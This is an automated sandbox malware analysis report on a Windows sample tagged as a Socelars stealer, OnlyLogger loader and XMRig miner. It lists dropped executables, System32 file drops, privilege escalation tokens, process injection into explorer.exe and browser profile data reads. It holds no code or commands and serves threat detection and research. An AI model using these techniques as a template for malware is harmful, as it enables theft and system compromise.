Malware Analysis Report

2024-11-13 19:46

Sample ID 220725-fyf1magdan
Target 562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c
SHA256 562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c
Tags
onlylogger socelars xmrig loader miner spyware stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c

Threat Level: Known bad

The file 562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c was found to be: Known bad.

Malicious Activity Summary

onlylogger socelars xmrig loader miner spyware stealer

Socelars payload

xmrig

Socelars

Process spawned unexpected child process

OnlyLogger

XMRig Miner payload

OnlyLogger payload

Downloads MZ/PE file

Executes dropped EXE

Unexpected DNS network traffic destination

Reads user/profile data of web browsers

Loads dropped DLL

Checks computer location settings

Looks up external IP address via web service

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Program crash

Enumerates physical storage devices

NSIS installer

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Modifies registry class

Kills process with taskkill

Script User-Agent

Modifies system certificate store

Suspicious behavior: LoadsDriver

Suspicious use of SetWindowsHookEx

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2022-07-25 05:16

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2022-07-25 05:16

Reported

2022-07-25 05:19

Platform

win10v2004-20220721-en

Max time kernel

128s

Max time network

168s

Command Line

"C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe"

Signatures

OnlyLogger

loader onlylogger

Process spawned unexpected child process

Description Indicator Process Target
Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process N/A C:\Windows\system32\rundll32.exe

Socelars

stealer socelars

Socelars payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

xmrig

miner xmrig

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Downloads MZ/PE file

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mali.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\inst1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\mali.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime2.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime5.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime7.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\anytime8.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Chrome6.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\aL8sr8AGdCh7H\Routes License Agreement.exe N/A
N/A N/A C:\Windows\system32\services64.exe N/A
N/A N/A C:\Windows\system32\services64.exe N/A
N/A N/A C:\Windows\system32\services64.exe N/A
N/A N/A C:\Windows\system32\services64.exe N/A
N/A N/A C:\Windows\system32\services64.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe N/A
N/A N/A C:\Windows\system32\Microsoft\Libs\sihost64.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime2.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\mali.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime4.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime5.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime8.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime1.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime3.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\anytime7.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\LzmwAqmV.exe N/A

Reads user/profile data of web browsers

spyware stealer

Legitimate hosting services abused for malware hosting/C2

Looks up geolocation information via web service

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Libs\WR64.sys C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File created C:\Windows\system32\services64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A
File opened for modification C:\Windows\system32\Microsoft\Libs\sihost64.exe C:\Windows\System32\conhost.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4668 set thread context of 5240 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4816 set thread context of 5388 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4732 set thread context of 5024 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe
PID 4212 set thread context of 5476 N/A C:\Windows\System32\conhost.exe C:\Windows\explorer.exe

Enumerates physical storage devices

NSIS installer

installer
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\taskkill.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2372564722-193526734-2636556182-1000_Classes\Local Settings C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe N/A

Script User-Agent

Description Indicator Process Target
HTTP User-Agent header Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5) N/A N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\conhost.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeMachineAccountPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemtimePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreatePermanentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeAuditPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeUndockPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeSyncAgentPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeEnableDelegationPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeManageVolumePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeCreateGlobalPrivilege N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 31 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 32 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 33 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 34 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: 35 N/A C:\Users\Admin\AppData\Local\Temp\askinstall63.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime1.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime4.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime5.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime6.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime7.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\anytime8.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\bearvpn3.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\taskkill.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\conhost.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1444 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
PID 1444 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
PID 1444 wrote to memory of 612 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\LightCleaner2352312.exe
PID 1444 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1444 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1444 wrote to memory of 1644 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1444 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe
PID 1444 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe
PID 1444 wrote to memory of 2084 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\inst1.exe
PID 1444 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1444 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1444 wrote to memory of 4568 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\setup.exe
PID 1444 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1444 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1444 wrote to memory of 4332 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\askinstall63.exe
PID 1444 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1444 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1444 wrote to memory of 3316 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\Routes Installation.exe
PID 1444 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
PID 1444 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
PID 1444 wrote to memory of 2104 N/A C:\Users\Admin\AppData\Local\Temp\562a34ab385f912a2d9dcb99beebf634188ed3b1f09fcec7a0c121f7b9beb48c.exe C:\Users\Admin\AppData\Local\Temp\search_hyperfs_213.exe
PID 1644 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1644 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
PID 1644 wrote to memory of 1340 N/A C:\Users\Admin\AppData\Local\Temp\mali.exe C:\Users\Admin\AppData\Local\Temp\mali.exe
